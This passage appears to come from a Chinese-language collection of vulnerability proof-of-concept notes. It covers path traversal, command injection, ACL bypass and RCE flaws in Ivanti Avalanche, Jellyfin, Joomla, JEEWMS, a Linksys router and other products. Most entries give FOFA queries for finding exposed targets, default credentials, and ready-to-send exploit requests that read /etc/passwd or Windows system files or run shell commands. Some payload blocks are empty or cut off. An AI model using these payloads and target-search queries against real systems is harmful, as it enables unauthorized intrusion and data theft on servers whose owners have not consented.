15 | https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/Program Files/Microsoft SQL Server/MSSQL11.SQLEXPRESS/MSSQL/DATA/Avalanche.mdf
16 |
17 | 其它:
18 | https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/Windows/system32/config/system.sav
19 | https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/sysprep/sysprep.inf
20 |
21 | ```
22 |
23 | ref:
24 |
25 | https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
--------------------------------------------------------------------------------
/JD-FreeFuck 后台命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | # JD-FreeFuck 后台命令执行漏洞
2 |
3 | JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器
4 |
5 | 项目地址:https://github.com/meselson/JD-FreeFuck
6 |
7 | FOFA:
8 |
9 | ```
10 | title="京东薅羊毛控制面板"
11 | ```
12 |
13 | 默认账号密码为
14 |
15 | `useradmin/supermanito`
16 |
17 | PoC:
18 |
19 | ```bash
20 | POST /runCmd HTTP/1.1
21 | Host: 101.200.189.251:5678
22 | Content-Length: 50
23 | Pragma: no-cache
24 | Cache-Control: no-cache
25 | Accept: */*
26 | X-Requested-With: XMLHttpRequest
27 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
28 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
29 | Accept-Encoding: gzip, deflate
30 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
31 | Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U
32 | Connection: close
33 |
34 | cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
35 | ```
36 |
37 | from:https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
--------------------------------------------------------------------------------
/JEEWMS 未授权任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # JEEWMS 未授权任意文件读取漏洞
2 |
3 | 厦门市灵鹿谷科技有限公司 JEEWMS /systemController/showOrDownByurl.do文件 存在未授权任意文件读取漏洞,攻击者可利用该漏洞获取服务器文件,导致大量敏感信息泄露.
4 |
5 |
6 | ```
7 | http://target/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
8 | http://target/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
9 | ```
10 |
11 | ref:
12 |
13 | https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=4033
--------------------------------------------------------------------------------
/Jellyfin 任意文件读取(CVE-2021-21402).md:
--------------------------------------------------------------------------------
1 | # Jellyfin 任意文件读取(CVE-2021-21402)
2 |
3 | Jellyfin是一个免费软件媒体系统。在10.7.1版之前的Jellyfin中,带有某些终结点的精心设计的请求将允许从Jellyfin服务器的文件系统中读取任意文件。
4 |
5 | fofa:
6 |
7 | ```
8 | title="Jellyfin"
9 | ```
10 |
11 | 任意文件读取:
12 |
13 | ```
14 | //以下请求jellyfin.db将从服务器下载带有密码的数据库
15 | GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1
16 | GET /Videos/anything/hls/m/..%5Cdata%5Cjellyfin.db HTTP/1.1
17 | ```
18 |
19 | 
20 |
21 |
22 | ref:
23 |
24 | * https://nvd.nist.gov/vuln/detail/CVE-2021-21402
25 | * https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/
26 | * https://forum.ywhack.com/thread-115353-1-7.html
--------------------------------------------------------------------------------
/Joomla CMS 框架 ACL 安全访问控制漏洞(CVE-2020-35616).md:
--------------------------------------------------------------------------------
1 | # Joomla CMS 框架 ACL 安全访问控制漏洞(CVE-2020-35616)
2 |
3 | POST请求表单中的ACL规则集的格式: jform[rules][core.PERMISSION][GROUP_ID]
4 |
5 | ```
6 | jform[rules][core.delete][ID]
7 | jform[rules][core.edit][ID]
8 | jform[rules][core.edit.state][ID]
9 | jform[rules][core.edit.own][ID]
10 | ```
11 |
12 | 如果将这些POST请求参数设置为值1,则基本上将这些特定权限设置为Allowed
13 |
14 | **PoC:**
15 |
16 | ```
17 | POST administrator/index.php?option={Target Category}
18 | ...
19 | ...
20 | ...
21 | &jform[rules][core.{create|delete|edit}][AttackerID]=1
22 | ```
23 |
24 | 如上所述,我们希望向组ID为7的管理员授予所有权限。因此,在保存表单时,我们需要附加以下POST数据:
25 |
26 | ```
27 | &jform[rules][core.create][7]=1&jform[rules][core.delete][7]=1&jform[rules][core.edit][7]=1&jform[rules][core.edit.state][7]=1&jform[rules][core.edit.own][7]=1
28 | ```
29 |
30 | 
31 |
32 |
33 | PoC验证视频:
34 | https://youtu.be/AZr6WydbUA0
35 |
36 | 详细分析文章见:https://blog.securelayer7.net/latest-joomla-exploit-cve-2020-35616-acl-security-vulnerabilities/
--------------------------------------------------------------------------------
/Joomla com_media 后台 RCE (CVE-2021-23132).md:
--------------------------------------------------------------------------------
1 | # Joomla com_media 后台 RCE (CVE-2021-23132)
2 |
3 | 影响版本:
4 |
5 | Joomla core <=3.9.24
6 |
7 | * CVE-2021-23132 com_media allowed paths that are not intended for image uploads to RCE.
8 | * CVE-2020-24597 Directory traversal in com_media to RCE
9 |
10 |
11 | 步骤:
12 |
13 | 获取超级管理员权限,触发RCE。
14 |
15 | **PoC:**
16 |
17 | ```
18 | http://target/templates/protostar/error.php?cmd=ls
19 | python3 cve-2021-23132.py -url http://192.168.72.140 -u admin -p 1234 -rce 1 -cmd ls
20 | ```
21 |
22 | poc.py:https://github.com/HoangKien1020/CVE-2021-23132
--------------------------------------------------------------------------------
/KEADCOM 数字系统接入网关任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # KEADCOM 数字系统接入网关任意文件读取漏洞
2 |
3 |
4 | KEADCOM 数字系统接入网关 FileDownloadServlet 存在任意文件读取漏洞,攻击者通过构造请求可以读取服务器任意文件。
5 |
6 |
7 | fofa:
8 |
9 | ```
10 | (app="KEDACOM-DVR接入网关") && (is_honeypot=false && is_fraud=false)
11 | ```
12 |
13 | poc:
14 |
15 | ```
16 | http://target//gatewayweb/FileDownloadServlet?fileName=pq.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2
17 |
18 | ```
19 |
20 | ref:
21 |
22 | https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=3969
--------------------------------------------------------------------------------
/Kubernetes 准入机制绕过(CVE-2021-25735).md:
--------------------------------------------------------------------------------
1 | # Kubernetes 准入机制绕过(CVE-2021-25735)
2 |
3 | 在kube-apiserver中发现一个漏洞,该漏洞可能允许节点更新绕过Validation Admission Webhook。如果攻击者具有足够的权限,并且利用旧 Node 对象属性(例如 Node.NodeSpec 中的字段)实现了验证准入网络钩子,则攻击者可以更新节点的属性,这可能会导致集群受到危害。
4 |
5 | 影响版本:
6 |
7 | * kube-apiserver v1.20.0 至 v1.20.5
8 | * kube-apiserver v1.19.0 至 v1.19.9
9 | * kube-apiserver <= v1.18.17
10 |
11 | 利用CVE-2021-25735:
12 |
13 | 通过执行组合操作将changeAllowed标签更改为true并添加一个新标签,触发该漏洞,新的值已被准入控制器覆盖。
14 |
15 |
16 | ```
17 | labels:
18 | test: test
19 | changeAllowed: "true"
20 | ```
21 |
22 | 详情可以参考:https://sysdig.com/blog/cve-2021-25735-kubernetes-admission-bypass/
23 |
24 | ref:
25 |
26 | * https://sysdig.com/blog/cve-2021-25735-kubernetes-admission-bypass/
27 | * https://github.com/darryk10/CVE-2021-25735
28 | * https://nvd.nist.gov/vuln/detail/CVE-2021-25735
29 | * https://cloud.google.com/kubernetes-engine/docs/security-bulletins
--------------------------------------------------------------------------------
/LightCMS 存储型XSS(CVE-2021-3355).md:
--------------------------------------------------------------------------------
1 | # LightCMS 存储型XSS(CVE-2021-3355)
2 |
3 | lightCMS 是一个轻量级的 CMS 系统,也可以作为一个通用的后台管理框架使用。lightCMS 集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等 CMS 系统中常用的功能。LightCMSv1.3.4版本中发现了一个持久性XSS漏洞。
4 |
5 | 影响版本:
6 |
7 | LightCMS v1.3.4
8 |
9 | **复现步骤:**
10 |
11 | * 1.登录后台
12 | * 2.访问:/admin/SensitiveWords/create 新增敏感词中的专有词值(exclusive)中填入Payload即可。
13 | * 3.访问/admin/SensitiveWords触发。
14 |
15 | PoC:
16 |
17 |
18 | ```
19 |
20 | ```
21 |
22 | ref:
23 |
24 | * https://nvd.nist.gov/vuln/detail/CVE-2021-3355
25 | * https://github.com/eddy8/LightCMS/issues/18
--------------------------------------------------------------------------------
/Linksys WRT160NL 身份验证命令注入(CVE-2021-25310).md:
--------------------------------------------------------------------------------
1 | # Linksys WRT160NL 身份验证命令注入(CVE-2021-25310)
2 |
3 | FOFA:
4 |
5 | ```
6 | app="LINKSYS-WRT160NL"
7 | ```
8 |
9 | 成功利用此漏洞可能导致在受影响的设备上远程执行代码。
10 |
11 | 管理Web面板允许用户更改UI语言,以将POST请求发送到apply.cgi。该参数在内部作为系统命令中文件系统路径的一部分。缺少输出编码和输入验证,使经过身份验证的攻击者能够注入将以root特权执行系统命令。
12 |
13 | PoC:
14 |
15 | ```bash
16 | POST /apply.cgi;session_id=8e780f3bcc71e19a37cc3e60a5576241 HTTP/1.1
17 | Host: 192.168.1.150
18 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
19 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
20 | Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
21 | Accept-Encoding: gzip, deflate
22 | Content-Type: application/x-www-form-urlencoded
23 | Content-Length: 854
24 | Origin: http://192.168.1.150
25 | Connection: close
26 | Referer: http://192.168.1.150/index.asp;session_id=8e780f3bcc71e19a37cc3e60a5576241
27 | Upgrade-Insecure-Requests: 1
28 |
29 | pptp_dhcp=0&(...)&ui_language=es||ls>/tmp/b||&(...)
30 | ```
31 |
32 | ref:
33 |
34 | * https://research.nccgroup.com/2021/01/28/technical-advisory-linksys-wrt160nl-authenticated-command-injection-cve-2021-25310/
35 | * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25310
36 | * https://forum.ywhack.com/thread-115065-1-1.html
--------------------------------------------------------------------------------
/Mark Text Markdown 编辑器RCE(CVE-2021-29996).md:
--------------------------------------------------------------------------------
1 | # Mark Text Markdown 编辑器RCE(CVE-2021-29996)
2 |
3 | Mark Text 0.16.3可以使攻击者任意执行命令。通过打开包含变异跨站脚本(XSS)Payload的.md文件,这可能导致远程执行代码(RCE)。
4 |
5 | PoC:
6 |
7 | ```
21 |
24 |
25 |
26 | Æ
27 |
28 |